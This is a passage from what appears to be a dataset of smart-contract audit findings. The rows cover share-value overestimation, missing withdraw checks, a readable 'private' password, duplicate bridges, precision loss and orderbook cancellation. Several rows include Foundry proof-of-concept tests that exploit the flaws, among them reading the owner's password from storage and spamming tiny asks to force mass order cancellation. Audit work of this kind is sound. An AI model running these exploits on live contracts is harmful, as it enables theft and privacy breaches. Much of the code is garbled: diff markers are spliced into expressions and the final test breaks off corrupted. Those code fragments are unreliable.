The longer the period since the last `mintFee` was called the more overestimated shares value is.",Consider adding `pendingFee` to the totalSupply:\\n```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n// Remove the line below\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n// Add the line below\\n return equityValue_ * SAFE_MULTIPLIER / (totalSupply_ // Add the line below\\n pendingFee(self));\\n } \\n```\\n,The `GMXReader.svTokenValue` function returns an overestimated value of the share token. This issue can cause the protocol unexpected behavior while keepers provide rebalance and when other protocols receive information about the shares value.\\nTools used\\nManual Review,```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n }\\n```\\n +The `afterWithdrawChecks` applies only if user wants to withdraw in tokenA/B,high,"The `afterWithdrawChecks` check is very important to be sure that important health parameters are in the proper ranges. But the check is inside brackets of the `if user wants to withdraw in tokenA/B` statement. So if the user wants to withdraw LP-token the check is not provided. This can cause unexpected financial losses.\\nThe `afterWithdrawChecks` check is placed inside the brackets of the if-statement of the `GMXProcessWithdraw.processWithdraw` function. This statement checks `if user wants to withdraw in tokenA/B`. 
In other cases the `afterWithdrawChecks` check is not provided but should.\\n```\\n 69 // Else if user wants to withdraw in LP token, the tokensToUser is already previously\\n 70 // set in GMXWithdraw.withdraw()\\n 71 if (\\n 72 self.withdrawCache.withdrawParams.token == address(self.tokenA) ||\\n 73 self.withdrawCache.withdrawParams.token == address(self.tokenB)\\n 74 ) {\\n\\n104 GMXChecks.afterWithdrawChecks(self);\\n105 }\\n106 } \\n```\\n",I suppose that the check should be placed after the if statement brackets.,The issue can cause unexpected financial losses.\\nTools used\\nManual Review,"```\\n 69 // Else if user wants to withdraw in LP token, the tokensToUser is already previously\\n 70 // set in GMXWithdraw.withdraw()\\n 71 if (\\n 72 self.withdrawCache.withdrawParams.token == address(self.tokenA) ||\\n 73 self.withdrawCache.withdrawParams.token == address(self.tokenB)\\n 74 ) {\\n\\n104 GMXChecks.afterWithdrawChecks(self);\\n105 }\\n106 } \\n```\\n" +Owner's password stored in the `s_password` state variable is not a secret and can be seen by everyone,high,"The protocol is using a `private` state variable to store the owner's password under the assumption that being a ""private"" variable its value is a secret from everyone else except the owner; which is a completely false assumption.\\nIn Solidity, marking a variable as `private` doesn't mean that the data stored in that variable is entirely secret or `private` from all observers of the blockchain. While it restricts direct external access to the variable from other contracts, it's essential to understand that the data on the blockchain is inherently transparent and can be viewed by anyone. 
Other smart contracts and blockchain explorers can still access and read the data if they know where to look.\\n'Private' in Solidity primarily provides encapsulation and access control within the contract itself, rather than offering complete data privacy on the public blockchain.\\n```\\nstring private s_password;\\n```\\n\\nAforementioned is the `s_password` variable which is being assumed as a secret by the protocol for it being a `private` variable. This is a completely false assumption since all data on the blockchain is public.\\nActors:\\nAttacker: Any non-owner malicious actor on the network.\\nVictim: Owner of the PasswordStore protocol.\\nProtocol: PasswordStore is meant to allow only the owner to store and retrieve their password securely.\\nWorking Test Case:\\n(Note : Though the following code fetches the Victim's password correctly in ASCII format; with my current skills in Solidity I've been struggling to make the `assertEq()` function return `true` when comparing the two strings. 
The problem seems to be with how the result of `abi.encodePacked()` for `anyoneCanReadPassword` variable fetched from `vm.load` has a bunch of trailing zeroes in it while the same for `victimPassword` doesn't.\\nTherefore my current POC proves the exploit by using `console.log` instead of `assertEq` )\\nWrite and run the following test case in the `PasswordStore.t.sol` test file.\\n```\\nfunction test_any_non_owner_can_see_password() public {\\n string memory victimPassword = ""mySecretPassword""; // Defines Victim's (Owner's) password\\n vm.startPrank(owner); // Simulates Victim's address for the next call\\n passwordStore.setPassword(victimPassword); // Victim sets their password\\n\\n // At this point, Victim thinks their password is now ""privately"" stored on the protocol and is completely secret.\\n // The exploit code that now follows can be performed by just about everyone on the blockchain who are aware of the Victim's protocol and can access and read the Victim's password.\\n\\n /////////// EXPLOIT CODE performed by Attacker ///////////\\n\\n // By observing the protocol's source code at `PasswordStore.sol`, we notice that `s_password` is the second storage variable declared in the contract. Since storage slots are alloted in the order of declaration in the EVM, its slot value will be '1'\\n uint256 S_PASSWORD_STORAGE_SLOT_VALUE = 1;\\n\\n // Access the protocol's storage data at slot 1\\n bytes32 slotData = vm.load(\\n address(passwordStore),\\n bytes32(S_PASSWORD_STORAGE_SLOT_VALUE)\\n );\\n\\n // Converting `bytes` data to `string`\\n string memory anyoneCanReadPassword = string(\\n abi.encodePacked(slotData)\\n );\\n // Exposes Victim's password on console\\n console.log(anyoneCanReadPassword);\\n}\\n```\\n\\nMake sure to run the test command with `-vv` flag to see the `Logs` in command output.","All data on the blockchain is public. To store sensitive information, additional encryption or off-chain solutions should be considered. 
Sensitive and personal data should never be stored on the blockchain in plaintext or weakly encrypted or encoded format.",This vulnerability completely compromises the confidentiality of the protocol and exposes the sensitive private data of the owner of the protocol to everyone on the blockchain.,```\\nstring private s_password;\\n```\\n +No check if bridge already exists,low,"In the current `createBridge` function of the OwnerFacet.sol contract, a critical check to verify if the bridge already exists is missing. This omission can potentially result in double accounting in the yield generation process.\\nIn the rest of the OwnerFacet.sol contract functionality, there are checks in place to prevent the recreation of Vaults or Markets. However, this essential check is absent in the `createBridge()` function. The absence of this check can lead to the unintended creation of duplicate bridges, resulting in double accounting of yield if multiple vaults utilize the same bridge more than once. You can find the missing check in the code here: Link to code.\\nThe potential for double accounting of yield is evident in the following code block:\\n```\\nfunction getZethTotal(uint256 vault) internal view returns (uint256 zethTotal) {\\n AppStorage storage s = appStorage();\\n address[] storage bridges = s.vaultBridges[vault];\\n uint256 bridgeCount = bridges.length;\\n\\n for (uint256 i; i < bridgeCount;) {\\n zethTotal += IBridge(bridges[i]).getZethValue(); \\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nTo demonstrate this behavior, a simple Proof of Concept (PoC) was created. 
(The test was placed in the Yield.t.sol file.)\\n```\\nfunction test_double_bridge_push() public {\\n vm.prank(owner);\\n diamond.createBridge(_bridgeReth, Vault.CARBON, 0, 0);\\n diamond.getUndistributedYield(Vault.CARBON); \\n assert(diamond.getUndistributedYield(Vault.CARBON) > 0); // As no yield was generated, this should not be true, but in current situation, it is a proof of double accounting.\\n}\\n```\\n","No check if bridge already exists\\nTo address this vulnerability, it is recommended to add the following mitigation to the createBridge function:\\n```\\n// rest of code\\n// Add the line below\\n for (uint i = 0; i < s.vaultBridges[vault].length; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n if (s.vaultBridges[vault][i] == bridge) {\\n// Add the line below\\n revert Errors.BridgeAlreadyExist();\\n// Add the line below\\n }\\n// Add the line below\\n }\\n```\\n\\nThis change will prevent the inadvertent creation of duplicate bridges and mitigate the risk of double accounting of yield.","In specific circumstances, if a DAO proposal is confirmed, it could inadvertently trigger the creation of a bridge with the same address for a vault that already uses it. This scenario can lead to double accounting of yield and, as a consequence, potentially expose the protocol to vulnerabilities such as Denial of Service and yield theft.\\nHowever, it's important to note that the likelihood of this issue occurring is relatively low, and the function is governed by the DAO. 
After discussing this with the sponsor, we have classified this finding as low severity.",```\\nfunction getZethTotal(uint256 vault) internal view returns (uint256 zethTotal) {\\n AppStorage storage s = appStorage();\\n address[] storage bridges = s.vaultBridges[vault];\\n uint256 bridgeCount = bridges.length;\\n\\n for (uint256 i; i < bridgeCount;) {\\n zethTotal += IBridge(bridges[i]).getZethValue(); \\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n +Loss of precision in `twapPriceInEther` due to division before multiplication,low,"When calculating `twapPriceInEther`, `twapPrice` is divided by 1e6 before multiplication with 1e18 is done.\\n```\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n \\n // more code\\n\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L64-L85\\nAccording to the above calculation, the `twapPrice` obtained would be precise upto 6 decimal places. 
Performing division before multiplying with 1e18 will result in loss of this precision and.\\nExample Scenario\\n```\\ntwapPrice = 1902501929\\ntwapPriceInEther = 1902000000000000000000\\n\\n// if multiplication is performed earlier,\\ntwapPriceInEther = 1902501929000000000000\\n```\\n","Perform the multiplication before division.\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/libraries/LibOracle.sol b/contracts/libraries/LibOracle.sol\\nindex 23d1d0a..6962ad7 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/libraries/LibOracle.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/libraries/LibOracle.sol\\n@@ // Remove the line below\\n82,7 // Add the line below\\n82,7 @@ library LibOracle {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n// Remove the line below\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n// Add the line below\\n uint256 twapPriceInEther = (twapPrice * 1 ether) / Constants.DECIMAL_USDC;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n```\\n",Price used can have -1 (in 18 decimals) difference from the original price.,"```\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n \\n // more code\\n\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n```\\n" +`onERC721Received()` callback is never called when new tokens are minted in Erc721Facet.sol,low,"The ERC721Facet contract 
does not properly call the corresponding callback when new tokens are minted. The ERC721 standard states that the onERC721Received callback must be called when a mint or transfer operation occurs. However, the smart contracts interacting as users with `Erc721Facet.mintNFT()` will not be notified with the onERC721Received callback, as expected according to the ERC721 standard.\\n`onErc721Received()` isn't called on minting:\\n```\\n function mintNFT(address asset, uint8 shortRecordId)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, shortRecordId)\\n {\\n if (shortRecordId == Constants.SHORT_MAX_ID) {\\n revert Errors.CannotMintLastShortRecord();\\n }\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][msg.sender][shortRecordId];\\n\\n if (short.tokenId != 0) revert Errors.AlreadyMinted();\\n\\n s.nftMapping[s.tokenIdCounter] = STypes.NFT({\\n owner: msg.sender,\\n assetId: s.asset[asset].assetId,\\n shortRecordId: shortRecordId\\n });\\n\\n short.tokenId = s.tokenIdCounter;\\n\\n //@dev never decreases\\n s.tokenIdCounter += 1;\\n }\\n```\\n",Call `onErc721Received()`,It can create interoperability issues with users' contracts,"```\\n function mintNFT(address asset, uint8 shortRecordId)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, shortRecordId)\\n {\\n if (shortRecordId == Constants.SHORT_MAX_ID) {\\n revert Errors.CannotMintLastShortRecord();\\n }\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][msg.sender][shortRecordId];\\n\\n if (short.tokenId != 0) revert Errors.AlreadyMinted();\\n\\n s.nftMapping[s.tokenIdCounter] = STypes.NFT({\\n owner: msg.sender,\\n assetId: s.asset[asset].assetId,\\n shortRecordId: shortRecordId\\n });\\n\\n short.tokenId = s.tokenIdCounter;\\n\\n //@dev never decreases\\n s.tokenIdCounter += 1;\\n }\\n```\\n" +[L-4] Yield update will not happen at the 1k ETH threshold,low,"Yield updates happen for a vault when the 
`BRIDGE_YIELD_UPDATE_THRESHOLD` is met for the vault after a large bridge deposit. The `maybeUpdateYield` function handles this logic for updates when that happens (1000 ETH to be exact).\\nThreshold constant from:\\n```\\nFILE: 2023-09-ditto/contracts/libraries/Constants.sol\\n\\nLine 17:\\nuint256 internal constant BRIDGE_YIELD_UPDATE_THRESHOLD = 1000 ether;\\n\\nLine 18:\\nuint256 internal constant BRIDGE_YIELD_PERCENT_THRESHOLD = 0.01 ether; // 1%\\n```\\n\\n```\\nFILE: 2023-09-ditto/contracts/facets/BridgeRouterFacet.sol\\n\\nfunction maybeUpdateYield(uint256 vault, uint88 amount) private {\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (\\n zethTotal > Constants.BRIDGE_YIELD_UPDATE_THRESHOLD\\n && amount.div(zethTotal) > Constants.BRIDGE_YIELD_PERCENT_THRESHOLD\\n ) { // @audit should be >= to account for when threshold is met\\n // Update yield for ""large"" bridge deposits\\n vault.updateYield();\\n }\\n }\\n```\\n",Change the `>` operand in the `maybeUpdateYield` function to be `>=`.,In reality the yield update for the vault will not happen in the instances of 1000 ETH deposits unless the bridge deposit amount into the vault is > 1000 ETH and the percent is greater than 1%.,```\\nFILE: 2023-09-ditto/contracts/libraries/Constants.sol\\n\\nLine 17:\\nuint256 internal constant BRIDGE_YIELD_UPDATE_THRESHOLD = 1000 ether;\\n\\nLine 18:\\nuint256 internal constant BRIDGE_YIELD_PERCENT_THRESHOLD = 0.01 ether; // 1%\\n```\\n +"If the dao removes a bridge, user's deposited tokens for that bridge will be lost.",low,"If the dao removes a bridge for any (non-malicious) reason, user's deposited tokens for that bridge will be lost.\\nIn the `OwnerFacet.sol` the dao of the system has the option to remove a bridge by calling the `deleteBridge()` function. There is no check if there are any assets in the bridge. 
Also users may deposit funds in the bridge during the voting period.\\nPOC Add the following function in the `BridgeRouter.t.sol`\\n```\\nfunction test_DeleteBridgeWithAssets() public {\\n console.log(""Sender ethEscrowed in vault 2 before deposit: "", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n deal(_rethA, sender, 10000 ether);\\n\\n vm.startPrank(sender);\\n uint88 deposit1 = 1000 ether;\\n uint88 withdrawAmount = 100 ether;\\n diamond.deposit(_bridgeRethToBeDeleted, deposit1);\\n console.log(""Sender ethEscrowed in vault2 after deposit: "", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(""Sender ethEscrowed after withdraw: "", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n vm.stopPrank();\\n\\n console.log(""Balance of reth in the bridgeRethToBeDeleted: "", rethA.balanceOf(_bridgeRethToBeDeleted));\\n\\n /// INFO: DAO deletes the bridge after a vote has been passed\\n vm.startPrank(owner) ;\\n diamond.deleteBridge(_bridgeRethToBeDeleted);\\n vm.stopPrank();\\n\\n vm.startPrank(sender);\\n vm.expectRevert();\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(""Balance of reth in the bridgeRethToBeDeleted: "", rethA.balanceOf(_bridgeRethToBeDeleted));\\n vm.stopPrank();\\n }\\n```\\n\\nIn order to run this test, you also have to add\\n```\\n rethA.approve(\\n _bridgeRethToBeDeleted,\\n 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\\n );\\n```\\n\\nto `setUp()` function of the `BridgeROuter.t.sol` contract\\nIn `DeployHelper.sol` another bridge and vault have to be added in order for the test to run:\\n```\\n/// INFO: added by auditor\\n IBridge public bridgeRethToBeDeleted;\\n address public _bridgeRethToBeDeleted;\\n IAsset public zethToBeDeletedVault;\\n address public _zethToBeDeletedVault;\\n IRocketStorage public rocketStorageA;\\n address public _rocketStorageA;\\n IRocketTokenRETH public rethA;\\n address public 
_rethA;\\n```\\n\\nAdd the following to `deployContracts()` function\\n```\\nif (chainId == 31337) {\\n //mocks\\n _immutableCreate2Factory = deployCode(""ImmutableCreate2Factory.sol"");\\n\\n if (isMock) {\\n _steth = deployCode(""STETH.sol"");\\n _unsteth = deployCode(""UNSTETH.sol"", abi.encode(_steth));\\n _rocketStorage = deployCode(""RocketStorage.sol"");\\n _reth = deployCode(""RocketTokenRETH.sol"");\\n reth = IRocketTokenRETH(_reth);\\n _ethAggregator = deployCode(""MockAggregatorV3.sol"");\\n /// INFO: added by auditor\\n _rocketStorageA = deployCode(""RocketStorage.sol"");\\n _rethA = deployCode(""RocketTokenRETH.sol"");\\n rethA = IRocketTokenRETH(_rethA);\\n }\\n\\n rocketStorage = IRocketStorage(_rocketStorage);\\n /// INFO: added by auditor\\n rocketStorageA = IRocketStorage(_rocketStorageA);\\n steth = ISTETH(_steth);\\n unsteth = IUNSTETH(payable(_unsteth));\\n ethAggregator = IMockAggregatorV3(_ethAggregator);\\n }\\n\\n/// INFO: Added by auditor \\n _zethToBeDeletedVault = factory.safeCreate2(\\n salt,\\n abi.encodePacked(\\n vm.getCode(""Asset.sol:Asset""), abi.encode(_diamond, ""Zebra ETH Two"", ""ZETHT"")\\n )\\n );\\n\\n _bridgeRethToBeDeleted = factory.safeCreate2(\\n salt,\\n abi.encodePacked(\\n vm.getCode(""BridgeReth.sol:BridgeReth""),\\n abi.encode(_rocketStorageA, _diamond)\\n )\\n );\\n\\n bridgeRethToBeDeleted = IBridge(_bridgeRethToBeDeleted);\\n MTypes.CreateVaultParams memory vaultParams;\\n vaultParams.zethTithePercent = 10_00;\\n vaultParams.dittoMatchedRate = 1;\\n vaultParams.dittoShorterRate = 1;\\n diamond.createVault({zeth: _zeth, vault: Vault.CARBON, params: vaultParams});\\n\\n MTypes.CreateVaultParams memory vaultParamsTwo;\\n vaultParamsTwo.zethTithePercent = 9_00;\\n vaultParamsTwo.dittoMatchedRate = 1;\\n vaultParamsTwo.dittoShorterRate = 1;\\n zethToBeDeletedVault = IAsset(_zethToBeDeletedVault);\\n diamond.createVault({zeth: _zethToBeDeletedVault, vault: 2, params: vaultParamsTwo});\\n STypes.Vault memory 
carbonVaultConfigTwo = diamond.getVaultStruct(2);\\n assertEq(carbonVaultConfigTwo.zethTithePercent, 9_00);\\n\\n diamond.createBridge({\\n bridge: _bridgeRethToBeDeleted,\\n vault: 2,\\n withdrawalFee: 150,\\n unstakeFee: 0\\n });\\n \\n if (isMock) {\\n rocketStorage.setDeposit(_reth);\\n rocketStorage.setReth(_reth);\\n /// INFO: added by auditor\\n rocketStorageA.setDeposit(_rethA);\\n rocketStorageA.setReth(_rethA);\\n _setETH(4000 ether);\\n }\\n```\\n\\nTo run the test use `forge test -vvv --mt test_DeleteBridgeWithAsset`",In `deleteBridge()` make sure that the contract doesn't have any assets,"User's deposited `RETH` or `STETH` in that bridge will be lost, as the user doesn't have the option to withdraw them. Because the withdraw functions can only be called trough the `Diamond.sol`","```\\nfunction test_DeleteBridgeWithAssets() public {\\n console.log(""Sender ethEscrowed in vault 2 before deposit: "", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n deal(_rethA, sender, 10000 ether);\\n\\n vm.startPrank(sender);\\n uint88 deposit1 = 1000 ether;\\n uint88 withdrawAmount = 100 ether;\\n diamond.deposit(_bridgeRethToBeDeleted, deposit1);\\n console.log(""Sender ethEscrowed in vault2 after deposit: "", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(""Sender ethEscrowed after withdraw: "", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n vm.stopPrank();\\n\\n console.log(""Balance of reth in the bridgeRethToBeDeleted: "", rethA.balanceOf(_bridgeRethToBeDeleted));\\n\\n /// INFO: DAO deletes the bridge after a vote has been passed\\n vm.startPrank(owner) ;\\n diamond.deleteBridge(_bridgeRethToBeDeleted);\\n vm.stopPrank();\\n\\n vm.startPrank(sender);\\n vm.expectRevert();\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(""Balance of reth in the bridgeRethToBeDeleted: "", rethA.balanceOf(_bridgeRethToBeDeleted));\\n vm.stopPrank();\\n 
}\\n```\\n" +Users Lose Funds and Market Functionality Breaks When Market Reachs 65k Id,high,"if the orderbook of any market reach 65,000 dao can call the function cancelOrderFarFromOracle multiple times to cancel many orders up to 1000 order in each transaction ,or anyone can cancle the last order in one call.the users who issued the canclled orders will lost thier deposits.and the canclled process is not limited to a certain orders numbers.\\nsource : contracts/facets/OrderFacet.sol\\nFunction : cancelOrderFarFromOracle\\nwhen ever a user create a limit order (short limit,bid limit,ask limit), if the order did not match it get added to the orderbook, and the `assets amount` or `eth amount` uses to create this order is taken from the Virtual balance of the user in the system .\\nuserVault(in case of `bids` and shorts) or userAsset(in case of asks) we can see that here :\\n` // for asks:\\n s.assetUser[asset][order.addr].ercEscrowed -= order.ercAmount;\\n // for `shorts` :\\n s.vaultUser[vault][order.addr].ethEscrowed -= eth;\\n //for `bids` :\\n s.vaultUser[vault][order.addr].ethEscrowed -= eth;`\\nalso if there is no id's Recycled behind the Head the id for this orders gonna be the current id in s.asset[asset].orderId,and the `s.asset[asset].orderId` get increamented by one . this is true for all three types of orders. (shorts,asks,bids).\\nnow in case this ordersId reach 65k for a specific market, the DAO are able to cancle the last 1000 order, and any one can cancle last order in one call. 
since it's only checks for the ordersId > 65000.and by the last order i mean the last order of any time of limit orders (asks,shorts,bids).\\n`function cancelOrderFarFromOracle(address asset, O orderType, uint16 lastOrderId, uint16 numOrdersToCancel)\\n external\\n onlyValidAsset(asset)\\n nonReentrant\\n{\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n\\n if (numOrdersToCancel > 1000) {\\n revert Errors.CannotCancelMoreThan1000Orders();\\n }\\n\\n if (msg.sender == LibDiamond.diamondStorage().contractOwner) {\\n if (orderType == O.LimitBid && s.bids[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.bids.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n } else if (orderType == O.LimitAsk && s.asks[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.asks.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n } else if (orderType == O.LimitShort && s.shorts[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.shorts.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n } else {\\n revert Errors.NotLastOrder();\\n }\\n } else {\\n //@dev if address is not DAO, you can only cancel last order of a side\\n if (orderType == O.LimitBid && s.bids[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.bids.cancelOrder(asset, lastOrderId);\\n } else if (orderType == O.LimitAsk && s.asks[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.asks.cancelOrder(asset, lastOrderId);\\n } else if (orderType == O.LimitShort && s.shorts[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.shorts.cancelOrder(asset, lastOrderId);\\n } else {\\n revert Errors.NotLastOrder();\\n }\\n }\\n}\\n... 
....\\n// cancle many orders no extra checks :\\nfunction cancelManyOrders(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n uint16 lastOrderId,\\n uint16 numOrdersToCancel\\n ) internal {\\n uint16 prevId;\\n uint16 currentId = lastOrderId;\\n for (uint8 i; i < numOrdersToCancel;) {\\n prevId = orders[asset][currentId].prevId;\\n LibOrders.cancelOrder(orders, asset, currentId);\\n currentId = prevId;\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n...... .....\\n// no extrac checks in cancleOrder() function also. it set the order to Cancelled , remove it from the list, and Set it to be reused:\\nfunction cancelOrder(mapping(address => mapping(uint16 => STypes.Order)) storage orders, address asset, uint16 id)\\n internal\\n {\\n uint16 prevHEAD = orders[asset][Constants.HEAD].prevId;\\n\\n // remove the links of ID in the market\\n // @dev (ID) is exiting, [ID] is inserted\\n // BEFORE: PREV <-> (ID) <-> NEXT\\n // AFTER : PREV <----------> NEXT\\n orders[asset][orders[asset][id].nextId].prevId = orders[asset][id].prevId;\\n orders[asset][orders[asset][id].prevId].nextId = orders[asset][id].nextId;\\n\\n // create the links using the other side of the HEAD\\n emit Events.CancelOrder(asset, id, orders[asset][id].orderType);\\n _reuseOrderIds(orders, asset, id, prevHEAD, O.Cancelled);\\n}`\\nas we said the user balance get decreaced by the `value` of it's order he created. but since the order is set to cancelled the user never gonna be able to recieve thier amount back.cause cancelled orders can't be matched Neither cancelled again.\\nEx:\\na user create a limit bid as follow : {price: 0.0001 ether, amount: 10000 ether}.\\nwhen this order get cancelled : the user will loose : 0.0001 * 10000 = `1 ether` ZETH (or ETH)\\nthe shorters will lose more then others since thier balance get decreaced by : PRICE * AMOUNT * MARGIN.\\nThe second issue is there is no limit for how many orders can be cancelled. 
you can cancel the whole orders in a market that reaches 65K `orderId`. `limits shorts` ,limits `asks` or `limit bids` .starting from the last one.since the only Conditionto be able to cancel orders is the asset order ID reached this number. and if it reachs it. it never decrease .even if there is alot of orders behind head(non active) to be reused.\\na malicious actor Can targeted this vulnerability by creating numerous tiny limit `asks` pushing the `orderId` to be too high .and he can do so by creating `ask` with a very high price and very small amount so he can pass the `MinEth` amount check, he can just with less then `1 cusd` (in case of cusd market) create a bunsh of limit `asks` orders .\\nPOC :\\nusing the the main repo setup for testing , here a poc shows how a malicious user can fill the orderbook with bunsh of tiny `limit asks` with little cost. and how you can cancle all orders in case the orderId reachs 65k. also that there is no refund for the users that created this orders.\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {Errors} from ""contracts/libraries/Errors.sol"";\\nimport {Events} from ""contracts/libraries/Events.sol"";\\nimport {STypes, MTypes, O} from ""contracts/libraries/DataTypes.sol"";\\nimport {Constants} from ""contracts/libraries/Constants.sol"";\\nimport ""forge-std/console.sol"";\\nimport {OBFixture} from ""test/utils/OBFixture.sol"";\\n// import {console} from ""contracts/libraries/console.sol"";\\n\\ncontract POC is OBFixture {\\n address[3] private bidders = [address(435433), address(423432523), address(522366)];\\n address[3] private shorters = [address(243422243242), address(52353646324532), address(40099)];\\n address attacker = address(3234);\\n function setUp() public override {\\n super.setUp();\\n }\\n\\n // an attacker can fill the order book with a bunsh of asks that have too high price and low asset \\n function test_fillWithAsks() public {\\n // create a bunsh of asks with a high 
price :\\n depositUsd(attacker, DEFAULT_AMOUNT * 10000);\\n uint balanceAssetBefore = diamond.getAssetBalance(asset,attacker);\\n // minAsk = 0.0001 ether . 0.0001 ether = x * 1 , x =0.0001 ether * 1 ether\\n vm.startPrank(attacker);\\n for (uint i ; i< 1000 ;i++){\\n createLimitAsk( 10**24, 10**10); \\n }\\n vm.stopPrank();\\n STypes.Order[] memory asks = diamond.getAsks(asset);\\n console.log(""tiny asks created : "", asks.length);\\n console.log( ""hack cost asset"", balanceAssetBefore - diamond.getAssetBalance(asset,attacker));\\n\\n }\\n function test_cancleOrders() public {\\n //set the assetid to 60000;\\n diamond.setOrderIdT(asset,64998);\\n // create multiple bids and 1 shorts\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, bidders[0]); // id 64998\\n fundLimitShortOpt(uint80(DEFAULT_PRICE)*4, DEFAULT_AMOUNT, shorters[0]); //id 64999\\n fundLimitBidOpt(DEFAULT_PRICE*2, DEFAULT_AMOUNT, bidders[1]); // id 65000\\n fundLimitBidOpt(DEFAULT_PRICE*3 , DEFAULT_AMOUNT, bidders[2]); //id 65001\\n /* now we have the lists like this :\\n - for bids : Head <- Head <->65001<->65000<->64998->Tail\\n - for shorts: Head <- Head <->64999->Tail\\n */\\n\\n //lets cancle the all the bids :\\n canclebid(64998);\\n // - now : Head <-64998<-> Head <->65001<->65000->Tail\\n uint s1 = vm.snapshot();\\n vm.revertTo(s1);\\n canclebid(65000);\\n // - now : Head <-64998<->65000<-> Head <->65001->Tail\\n uint s2 = vm.snapshot();\\n vm.revertTo(s2);\\n canclebid(65001);\\n // - now : Head <-64998<->65000<->65001<-> Head ->Tail\\n // let's check the active bids :\\n STypes.Order[] memory Afterbids = diamond.getBids(asset);\\n // notice that we were able to delete all the bids even there was unActive ID's to be reused.\\n assertTrue(Afterbids.length == 0);\\n // also notice that the owners of this orders did not get refund thier zeth back that have been taken from them when they create this orders.\\n\\n for (uint i; i65001<->65000<->64998->Tail\\n - for shorts: Head <- Head 
